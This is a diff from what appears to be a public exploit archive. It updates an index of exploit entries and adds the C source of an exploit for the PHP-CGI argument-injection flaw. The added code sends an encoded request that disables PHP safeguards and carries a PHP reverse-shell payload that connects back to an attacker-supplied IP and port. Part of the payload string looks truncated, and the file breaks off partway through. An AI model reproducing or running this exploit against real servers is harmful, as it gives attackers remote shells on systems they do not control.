38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics Local File Include Vulnerability",2013-06-10,"Markus Wulftange",php,webapps,0 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash PoC",2015-10-29,"Luis Martínez",windows,dos,0 38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 -38566,platforms/hardware/dos/38566.py,"NetUSB Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 +38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 38567,platforms/php/webapps/38567.txt,"Max Forum Multiple Security Vulnerabilities",2013-06-09,"CWH Underground",php,webapps,0 38568,platforms/php/webapps/38568.txt,"WordPress Ambience Theme 'src' Parameter Cross Site Scripting Vulnerability",2013-06-09,Darksnipper,php,webapps,0 38569,platforms/php/webapps/38569.txt,"Lokboard 'index_4.php' PHP Code Injection Vulnerability",2013-06-10,"CWH Underground",php,webapps,0 @@ -34872,7 +34871,7 @@ id,file,description,date,author,platform,type,port 38586,platforms/android/remote/38586.txt,"TaxiMonger for Android 'name' Parameter HTML Injection Vulnerability",2013-06-15,"Ismail Kaleem",android,remote,0 38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin Security Bypass Vulnerability",2013-06-14,felipensp,multiple,remote,0 38588,platforms/php/webapps/38588.php,"bloofoxCMS 'index.php' Arbitrary File Upload Vulnerability",2013-06-17,"CWH Underground",php,webapps,0 -38589,platforms/linux/dos/38589.c,"Linux Kernel <= 3.0.5 'test_root()' Function Local Denial of Service Vulnerability",2013-06-05,"Jonathan Salwan",linux,dos,0 +38589,platforms/linux/dos/38589.c,"Linux Kernel <= 3.0.5 - 'test_root()' Function Local Denial of Service Vulnerability",2013-06-05,"Jonathan Salwan",linux,dos,0 38590,platforms/php/webapps/38590.txt,"et-chat Privilege Escalation and Arbitrary Shell Upload Vulnerabilities",2013-06-18,MR.XpR,php,webapps,0 38591,platforms/hardware/remote/38591.py,"TP-LINK TL-PS110U Print Server 'tplink-enum.py' Security Bypass Vulnerability",2013-06-19,SANTHO,hardware,remote,0 38592,platforms/php/webapps/38592.php,"Joomla! RokDownloads Component Arbitrary File Upload Vulnerability",2013-06-19,Am!r,php,webapps,0 @@ -34991,8 +34990,8 @@ id,file,description,date,author,platform,type,port 38710,platforms/windows/dos/38710.py,"foobar2000 1.3.9 - (.pls; .m3u; .m3u8) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0 38711,platforms/windows/dos/38711.py,"foobar2000 1.3.9 - (.asx) Local Crash PoC",2015-11-16,"Antonio Z.",windows,dos,0 38712,platforms/php/webapps/38712.txt,"Bo-Blog 2.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2013-08-20,"Ashiyane Digital Security Team",php,webapps,0 -38713,platforms/windows/dos/38713.txt,"Windows Kernel win32k.sys Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 -38714,platforms/windows/dos/38714.txt,"Windows Kernel win32k.sys Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 +38713,platforms/windows/dos/38713.txt,"Windows Kernel - win32k.sys Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 +38714,platforms/windows/dos/38714.txt,"Windows Kernel - win32k.sys Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 38715,platforms/hardware/remote/38715.txt,"D-Link DIR-815_ DIR-850L - SSDP Command Injection",2015-11-16,"Samuel Huntley",hardware,remote,1900 38716,platforms/hardware/remote/38716.txt,"D-Link DIR-890L/R - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 38717,platforms/hardware/remote/38717.txt,"D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 @@ -35053,7 +35052,7 @@ id,file,description,date,author,platform,type,port 38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0 38803,platforms/php/webapps/38803.txt,"WP-Client 3.8.7 - Stored XSS Vulnerability",2015-11-24,"Pier-Luc Maltais",php,webapps,80 38782,platforms/php/webapps/38782.php,"WordPress SEO Watcher Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution Vulnerability",2013-10-03,wantexz,php,webapps,0 -38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0 +38775,platforms/linux/local/38775.rb,"Chkrootkit - Local Privilege Escalation",2015-11-20,metasploit,linux,local,0 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection Vulnerability",2013-09-21,SixP4ck3r,php,webapps,0 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x and Security Gateway OS Denial Of Service Vulnerability",2013-09-23,anonymous,linux,dos,0 @@ -35072,7 +35071,7 @@ id,file,description,date,author,platform,type,port 38793,platforms/windows/dos/38793.txt,"Windows ndis.sys IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0 38794,platforms/windows/dos/38794.txt,"Windows Cursor Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38795,platforms/windows/dos/38795.txt,"Windows Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 -38796,platforms/windows/dos/38796.txt,"Windows Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 +38796,platforms/windows/dos/38796.txt,"Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38797,platforms/php/remote/38797.rb,"Joomla Content History SQLi Remote Code Execution",2015-11-23,metasploit,php,remote,80 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox Cookie Verification Denial of Service Vulnerability",2013-04-04,anonymous,multiple,dos,0 38799,platforms/php/webapps/38799.txt,"BilboPlanet 'auth.php' SQL Injection Vulnerability",2013-10-11,"Omar Kurt",php,webapps,0 @@ -35100,7 +35099,7 @@ id,file,description,date,author,platform,type,port 38822,platforms/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection",2015-11-28,hland,windows,webapps,8080 38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2 and 0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence XML External Entity Information Disclosure Vulnerability",2013-10-11,IBM,multiple,remote,0 -38826,platforms/linux/remote/38826.py,"Linux Kernel <= 3.0.5 'ath9k_htc_set_bssid_mask()' Function Information Disclosure Vulnerability",2013-12-10,"Mathy Vanhoef",linux,remote,0 +38826,platforms/linux/remote/38826.py,"Linux Kernel <= 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure Vulnerability",2013-12-10,"Mathy Vanhoef",linux,remote,0 38827,platforms/php/remote/38827.txt,"Nagios XI 'tfPassword' Parameter SQL Injection Vulnerability",2013-12-13,"Denis Andzakovic",php,remote,0 38828,platforms/php/webapps/38828.php,"Limonade framework 'limonade.php' Local File Disclosure Vulnerability",2013-11-17,"Yashar shahinzadeh",php,webapps,0 38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote SEH Buffer Overflow (DEP Bypass with ROP)",2015-11-30,Knaps,windows,remote,0 @@ -35118,7 +35117,7 @@ id,file,description,date,author,platform,type,port 38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin Cross Site Request Forgery Vulnerability",2013-11-23,"Haider Mahmood",php,webapps,0 38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 38846,platforms/multiple/remote/38846.txt,"nginx <= 1.1.17 URI Processing Security Bypass Vulnerability",2013-11-19,"Ivan Fratric",multiple,remote,0 -38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0 +38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0 38848,platforms/php/webapps/38848.php,"WordPress Suco Themes 'themify-ajax.php' Arbitrary File Upload Vulnerability",2013-11-20,DevilScreaM,php,webapps,0 38849,platforms/cgi/remote/38849.rb,"Advantech Switch Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection Vulnerability",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 @@ -35473,7 +35472,7 @@ id,file,description,date,author,platform,type,port 39211,platforms/php/webapps/39211.txt,"WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin Cross Site Request Forgery Vulnerability",2014-06-10,"Tom Adams",php,webapps,0 39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin Cross Site Request Forgery Vulnerability",2014-06-10,"Tom Adams",php,webapps,0 -39214,platforms/linux/local/39214.c,"Linux Kernel <= 3.3.5 '/drivers/media/media-device.c' Local Information Disclosure Vulnerability",2014-05-28,"Salva Peiro",linux,local,0 +39214,platforms/linux/local/39214.c,"Linux Kernel <= 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure Vulnerability",2014-05-28,"Salva Peiro",linux,local,0 39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21 39216,platforms/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash PoC",2016-01-11,"Mohammad Reza Espargham",windows,dos,0 39217,platforms/linux/local/39217.c,"Amanda <= 3.3.1 - Local Root Exploit",2016-01-11,"Hacker Fantastic",linux,local,0 @@ -35530,7 +35529,7 @@ id,file,description,date,author,platform,type,port 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 -39277,platforms/linux/local/39277.c,"Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0 +39277,platforms/linux/local/39277.c,"Linux Kernel - REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0 @@ -35594,7 +35593,7 @@ id,file,description,date,author,platform,type,port 39337,platforms/linux/shellcode/39337.c,"Linux x86/x86_64 tcp_bind Shellcode",2016-01-27,B3mB4m,linux,shellcode,0 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86_64 Read etc/passwd Shellcode",2016-01-27,B3mB4m,linux,shellcode,0 39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80 -39340,platforms/android/local/39340.cpp,"Android sensord Local Root Exploit",2016-01-27,s0m3b0dy,android,local,0 +39340,platforms/android/local/39340.cpp,"Android - sensord Local Root Exploit",2016-01-27,s0m3b0dy,android,local,0 39341,platforms/php/webapps/39341.txt,"WordPress Booking Calendar Contact Form <=1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 39342,platforms/php/webapps/39342.txt,"WordPress Booking Calendar Contact Form<=1.1.24 - addslashes SQL Injection Vulnerability",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 39343,platforms/php/webapps/39343.txt,"ol-commerce /OL-Commerce/affiliate_signup.php a_country Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35625,7 +35624,7 @@ id,file,description,date,author,platform,type,port 39369,platforms/osx/dos/39369.c,"OS X - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 39370,platforms/osx/dos/39370.c,"OS X Kernel - Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39376,platforms/osx/dos/39376.c,"OS X - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 -39377,platforms/multiple/dos/39377.c,"OS X and iOS Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0 +39377,platforms/multiple/dos/39377.c,"OS X and iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0 39378,platforms/multiple/dos/39378.c,"iOS and OS X - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",multiple,dos,0 39379,platforms/multiple/dos/39379.txt,"iOS and OS X Kernel - Double-Delete IOHIDEventQueue::start Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 39380,platforms/osx/dos/39380.c,"OS X - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 @@ -35678,7 +35677,7 @@ id,file,description,date,author,platform,type,port 39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2",2016-02-09,"Francis Provencher",windows,dos,0 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 -39432,platforms/windows/local/39432.c,"Microsoft Windows WebDAV - Privilege Escalation (MS16-016)",2016-02-10,koczkatamas,windows,local,0 +39432,platforms/windows/local/39432.c,"Microsoft Windows WebDAV - (BSoD) Privilege Escalation (MS16-016)",2016-02-10,koczkatamas,windows,local,0 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0 39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure Vulnerability",2016-02-10,Vulnerability-Lab,multiple,webapps,0 39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80 @@ -35739,7 +35738,7 @@ id,file,description,date,author,platform,type,port 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to {ip:port} with /bin/sh - 95 bytes",2016-02-26,Xeon,arm,shellcode,0 39497,platforms/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,ashx,webapps,0 39498,platforms/php/webapps/39498.txt,"WordPress Ocim MP3 Plugin - SQL Injection Vulnerability",2016-02-26,"xevil and Blankon33",php,webapps,80 -39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 Insecure Hostname Checking Remote Root Exploit",2016-02-26,Sysdream,linux,remote,0 +39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Root Exploit",2016-02-26,Sysdream,linux,remote,0 39500,platforms/linux/webapps/39500.txt,"Zimbra 8.0.9 GA - CSRF Vulnerability",2016-02-26,Sysdream,linux,webapps,443 39501,platforms/php/webapps/39501.txt,"Centreon <= 2.5.3 - Remote Command Execution",2016-02-26,Sysdream,php,webapps,0 39502,platforms/linux/dos/39502.py,"GpicView 0.2.5 - Crash PoC",2016-02-26,"David Silveiro",linux,dos,0 @@ -35796,8 +35795,8 @@ id,file,description,date,author,platform,type,port 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow DoS",2016-03-14,INSECT.B,windows,dos,0 39558,platforms/php/webapps/39558.txt,"WordPress Site Import Plugin 1.0.1 - Local and Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80 -39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 -39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 +39560,platforms/windows/dos/39560.txt,"Windows Kernel - ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 +39561,platforms/windows/dos/39561.txt,"Windows Kernel - ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 @@ -35820,3 +35819,8 @@ id,file,description,date,author,platform,type,port 39586,platforms/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - CSRF Vulnerabilities",2016-03-21,"High-Tech Bridge SA",php,webapps,80 39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - CSRF Vulnerability",2016-03-21,"High-Tech Bridge SA",php,webapps,80 39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple XSS Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80 +39589,platforms/php/webapps/39589.txt,"WordPress HB Audio Gallery Lite Plugin 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80 +39590,platforms/php/webapps/39590.txt,"Joomla Easy Youtube Gallery 1.0.2 - SQL Injection Vulnerability",2016-03-22,"Persian Hack Team",php,webapps,80 +39591,platforms/php/webapps/39591.txt,"WordPress Brandfolder Plugin 3.0 - RFI / LFI Vulnerability",2016-03-22,AMAR^SHG,php,webapps,80 +39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability",2016-03-22,AMAR^SHG,php,webapps,80 +39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80 diff --git a/platforms/php/remote/29290.c b/platforms/php/remote/29290.c new file mode 100755 index 000000000..e12b22a72 --- /dev/null +++ b/platforms/php/remote/29290.c @@ -0,0 +1,457 @@ +/* Apache Magica by Kingcope */ +/* gcc apache-magika.c -o apache-magika -lssl */ +/* This is a code execution bug in the combination of Apache and PHP. +On Debian and Ubuntu the vulnerability is present in the default install +of the php5-cgi package. When the php5-cgi package is installed on Debian and +Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under +/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute +the binary because this binary has a security check enabled when installed with +Apache http server and this security check is circumvented by the exploit. +When accessing the php-cgi binary the security check will block the request and +will not execute the binary. +In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security +check is done when the php.ini configuration setting cgi.force_redirect is set +and the php.ini configuration setting cgi.redirect_status_env is set to no. +This makes it possible to execute the binary bypassing the Security check by +setting these two php.ini settings. +Prior to this code for the Security check getopt is called and it is possible +to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the +-d switch. If both values are set to zero and the request is sent to the server +php-cgi gets fully executed and we can use the payload in the POST data field +to execute arbitrary php and therefore we can execute programs on the system. +apache-magika.c is an exploit that does exactly the prior described. It does +support SSL. +/* Affected and tested versions +PHP 5.3.10 +PHP 5.3.8-1 +PHP 5.3.6-13 +PHP 5.3.3 +PHP 5.2.17 +PHP 5.2.11 +PHP 5.2.6-3 +PHP 5.2.6+lenny16 with Suhosin-Patch +Affected versions +PHP prior to 5.3.12 +PHP prior to 5.4.2 +Unaffected versions +PHP 4 - getopt parser unexploitable +PHP 5.3.12 and up +PHP 5.4.2 and up +Unaffected versions are patched by CVE-2012-1823. +*/ +/* . + /'\rrq rk + . // \\ . +.x.//fco\\-|- + '//cmtco\\zt + //6meqrg.\\tq +//_________\\' +EJPGQO +apache-magica.c by Kingcope +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef struct { + int sockfd; + SSL *handle; + SSL_CTX *ctx; +} connection; + +void usage(char *argv[]) +{ + printf("usage: %s <--target target> <--port port> <--protocol http|https> " \ + "<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\n", + argv[0]); + exit(1); +} + +char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \ + "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \ + "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \ + "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \ + "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \ + "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \ + "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \ + "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \ + "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \ + "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \ + "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \ + "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \ + "Host: %s\r\n" \ + "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" \ + "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \ + "Content-Type: application/x-www-form-urlencoded\r\n" \ + "Content-Length: %d\r\n" \ + "Connection: close\r\n\r\n%s"; +char phpstr[] = " array(\"pipe\", \"r\"),\n" \ +" 1 => array(\"pipe\", \"w\"),\n" \ +" 2 => array(\"pipe\", \"w\")\n" \ +");\n" \ +"$process = proc_open($shell, $descriptorspec, $pipes);\n" \ +"if (!is_resource($process)) {\n" \ +" printit(\"ERROR: Can't spawn shell\");\n" \ +" exit(1);\n" \ +"}\n" \ +"stream_set_blocking($pipes[0], 0);\n" \ +"stream_set_blocking($pipes[1], 0);\n" \ +"stream_set_blocking($pipes[2], 0);\n" \ +"stream_set_blocking($sock, 0);\n" \ +"while (1) {\n" \ +" if (feof($sock)) {\n" \ +" printit(\"ERROR: Shell connection terminated\");\n" \ +" break;\n" \ +" }\n" \ +" if (feof($pipes[1])) {\n" \ +" printit(\"ERROR: Shell process terminated\");\n" \ +" break;\n" \ +" }\n" \ +" $read_a = array($sock, $pipes[1], $pipes[2]);\n" \ +" $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n" \ +" if (in_array($sock, $read_a)) {\n" \ +" if ($debug) printit(\"SOCK READ\");\n" \ +" $input = fread($sock, $chunk_size);\n" \ +" if ($debug) printit(\"SOCK: $input\");\n" \ +" fwrite($pipes[0], $input);\n" \ +" }\n" \ +" if (in_array($pipes[1], $read_a)) {\n" \ +" if ($debug) printit(\"STDOUT READ\");\n" \ +" $input = fread($pipes[1], $chunk_size);\n" \ +" if ($debug) printit(\"STDOUT: $input\");\n" \ +" fwrite($sock, $input);\n" \ +" }\n" \ +" if (in_array($pipes[2], $read_a)) {\n" \ +" if ($debug) printit(\"STDERR READ\");\n" \ +" $input = fread($pipes[2], $chunk_size);\n" \ +" if ($debug) printit(\"STDERR: $input\");\n" \ +" fwrite($sock, $input);\n" \ +" }\n" \ +"}\n" \ +"\n" \ +"fclose($sock);\n" \ +"fclose($pipes[0]);\n" \ +"fclose($pipes[1]);\n" \ +"fclose($pipes[2]);\n" \ +"proc_close($process);\n" \ +"function printit ($string) {\n" \ +" if (!$daemon) {\n" \ +" print \"$string\n\";\n" \ +" }\n" \ +"}\n" \ +"exit(1);\n" \ +"?>"; + +struct sockaddr_in *gethostbyname_(char *hostname, unsigned short port) +{ + struct hostent *he; + struct sockaddr_in server, *servercopy; + + if ((he=gethostbyname(hostname)) == NULL) { + printf("Hostname cannot be resolved\n"); + exit(255); + } + + servercopy = malloc(sizeof(struct sockaddr_in)); + if (!servercopy) { + printf("malloc error (1)\n"); + exit(255); + } + memset(&server, '\0', sizeof(struct sockaddr_in)); + memcpy(&server.sin_addr, he->h_addr_list[0], he->h_length); + server.sin_family = AF_INET; + server.sin_port = htons(port); + memcpy(servercopy, &server, sizeof(struct sockaddr_in)); + return servercopy; +} + +char *sslread(connection *c) +{ + char *rc = NULL; + int received, count = 0, count2=0; + char ch; + + for(;;) + { + if (!rc) + rc = calloc(1024, sizeof (char) + 1); + else + if (count2 % 1024 == 0) { + rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1); + } + received = SSL_read(c->handle, &ch, 1); + if (received == 1) { + rc[count++] = ch; + count2++; + if (count2 > 1024*5) + break; + } + else + break; + } + return rc; +} + +char *read_(int sockfd) +{ + char *rc = NULL; + int received, count = 0, count2=0; + char ch; + + for(;;) + { + if (!rc) + rc = calloc(1024, sizeof (char) + 1); + else + if (count2 % 1024 == 0) { + rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1); + } + received = read(sockfd, &ch, 1); + if (received == 1) { + rc[count++] = ch; + count2++; + if (count2 > 1024*5) + break; + } + else + break; + } + return rc; +} + +void main(int argc, char *argv[]) +{ + char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL, + *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL; + char httpsflag=0; + unsigned short port=0, reverseport=0; + struct sockaddr_in *server; + int sockfd; + unsigned int writesize, tmpsize; + unsigned int i; + connection *sslconnection; + printf("-== Apache Magika by Kingcope ==-\n"); + for(;;) + { + int c; + int option_index=0; + static struct option long_options[] = { + {"target", required_argument, 0, 0 }, + {"port", required_argument, 0, 0 }, + {"protocol", required_argument, 0, 0 }, + {"reverse-ip", required_argument, 0, 0 }, + {"reverse-port", required_argument, 0, 0 }, + {"force-interpreter", required_argument, 0, 0 }, + {0, 0, 0, 0 } + }; + + c = getopt_long(argc, argv, "", long_options, &option_index); + if (c < 0) + break; + + switch (c) { + case 0: + switch (option_index) { + case 0: + if (optarg) { + target = calloc(strlen(optarg)+1, sizeof(char)); + if (!target) { + printf("calloc error (2)\n"); + exit(255); + } + memcpy(target, optarg, strlen(optarg)+1); + } + break; + case 1: + if(optarg) + port = atoi(optarg); + break; + case 2: + protocol = calloc(strlen(optarg)+1, sizeof(char)); + if (!protocol) { + printf("calloc error (3)\n"); + exit(255); + } + memcpy(protocol, optarg, strlen(optarg)+1); + if (!strcmp(protocol, "https")) + httpsflag=1; + break; + case 3: + reverseip = calloc(strlen(optarg)+1, sizeof(char)); + if (!reverseip) { + printf("calloc error (4)\n"); + exit(255); + } + memcpy(reverseip, optarg, strlen(optarg)+1); + break; + case 4: + reverseport = atoi(optarg); + reverseportstr = calloc(strlen(optarg)+1, sizeof(char)); + if (!reverseportstr) { + printf("calloc error (5)\n"); + exit(255); + } + memcpy(reverseportstr, optarg, strlen(optarg)+1); + break; + case 5: + forceinterpreter = calloc(strlen(optarg)+1, sizeof(char)); + if (!forceinterpreter) { + printf("calloc error (6)\n"); + 